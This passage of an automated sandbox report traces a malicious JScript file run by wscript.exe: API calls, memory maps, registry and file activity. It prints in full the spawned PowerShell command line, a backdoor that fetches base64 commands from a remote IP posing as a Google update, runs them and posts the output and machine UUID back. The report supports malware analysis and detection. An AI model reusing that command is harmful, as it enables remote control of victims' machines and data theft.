| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7feffa67490 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x7feff0fe470 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x7feff0ff9b0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x7feff0ff660 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x7feffa5a4c4 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetClassObject, address_out = 0x7feffa72e18 |
|
1 | |
| Get Address | c:\windows\system32\wscript.exe | function = 1, address_out = 0xffd6d7f8 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteExW, address_out = 0x7fefdff7c70 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = UnregisterTraceGuids, address_out = 0x77c63c80 |
|
1 | |
| Create Mapping | C:\Windows\Tasks\Chrome.js | filename = C:\Windows\Tasks\Chrome.js, protection = PAGE_READONLY, maximum_size = 3250 |
|
1 | |
| Map | C:\Windows\Tasks\Chrome.js | process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WSH-Timer, wndproc_parameter = 4217248 |
|
1 |
System (27)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
2 | |
| Get Time | type = System Time, time = 2019-01-08 12:44:00 (UTC) |
|
5 | |
| Get Time | type = Ticks, time = 325761 |
|
1 | |
| Get Time | type = Ticks, time = 325808 |
|
3 | |
| Get Time | type = Ticks, time = 325854 |
|
2 | |
| Get Time | type = Ticks, time = 325901 |
|
1 | |
| Get Time | type = Ticks, time = 325932 |
|
3 | |
| Get Time | type = Ticks, time = 325948 |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory, result_out = ,î$ |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = JS_PROFILER |
|
1 |
Process #23: powershell.exe
79
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "$r=[System.Net.WebRequest]::Create('http://154.16.37.122/GoogleUpdate/Update.php'); $resp=$r.GetResponse();$respstream=$resp.GetResponseStream(); $sr=new-object System.IO.StreamReader $respstream; $Cmd=$sr.ReadToEnd();$Cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Cmd)); $cmdOut=Invoke-Expression -Command:$Cmd|Out-String;$ReCmd=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmdOut));$uuid=Invoke-Expression -Command:'wmic csproduct get uuid'|Out-String;$Reuid=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($uuid));$Pusl= 'http://154.16.37.122/GoogleUpdate/Google.php?Mac=';$Pusl=$Pusl+$Reuid;$Pusl=$Pusl+'?Data=';$Pusl=$Pusl+$ReCmd;[System.Net.WebRequest]$webRequest=[System.Net.WebRequest]::Create($Pusl);$webRequest.Method='POST';$webRequest.GetResponse();"; |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:33, Reason: Child Process |
| Unmonitor | End Time: 00:04:44, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x464 |
| Parent PID | 0x968 (c:\windows\system32\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2B4
0x
804
0x
5F0
0x
3B0
0x
670
0x
3F4
0x
7F0
0x
214
0x
8C8
0x
8A8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x002f0000 | 0x002f3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00300000 | 0x0031ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00330000 | 0x0035ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00770fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x01b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b80000 | 0x01b80000 | 0x01c7ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x01c80000 | 0x01c83fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x01c90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01ca2fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x01cb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01cdffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01cfffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01d00000 | 0x01d02fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01d10fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01d20000 | 0x01d24fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01d30000 | 0x01d37fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01dbffff | Private Memory | rwx |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01dc0000 | 0x01e25fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001e30000 | 0x01e30000 | 0x01e30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e40000 | 0x01e40000 | 0x01e40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e40000 | 0x01e40000 | 0x01e50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ef0000 | 0x01ef0000 | 0x01fcefff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01fd0000 | 0x0229efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0231ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02320000 | 0x023dffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x0245ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002460000 | 0x02460000 | 0x02852fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x02a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02a90000 | 0x02ad0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02b6ffff | Private Memory | rwx |
|
|
|
- |
| mscorrc.dll | 0x02b70000 | 0x02bc3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x1acbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001acc0000 | 0x1acc0000 | 0x1b38ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b390000 | 0x1b390000 | 0x1b490fff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b4a0000 | 0x1b781fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b790000 | 0x1b790000 | 0x1b88ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x75780000 | 0x75848fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13fe90000 | 0x13ff06fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7feefaa0000 | 0x7feefc34fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7feefc40000 | 0x7feefdabfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7feefdb0000 | 0x7fef0454fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fef0460000 | 0x7fef0577fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fef0580000 | 0x7fef0795fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fef07a0000 | 0x7fef0884fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fef0890000 | 0x7fef0bbdfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fef0bc0000 | 0x7fef171cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fef1720000 | 0x7fef2142fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fef2150000 | 0x7fef302bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fef3030000 | 0x7fef39ccfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fef7ea0000 | 0x7fef7f49fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fef7f50000 | 0x7fef8001fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef8010000 | 0x7fef807efff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fef80b0000 | 0x7fef8118fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fef90f0000 | 0x7fef912dfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fef9130000 | 0x7fef91c8fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef9210000 | 0x7fef9241fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x7fefbb40000 | 0x7fefbb46fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 52 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (19)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
2 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 |
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Environment (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
12 |
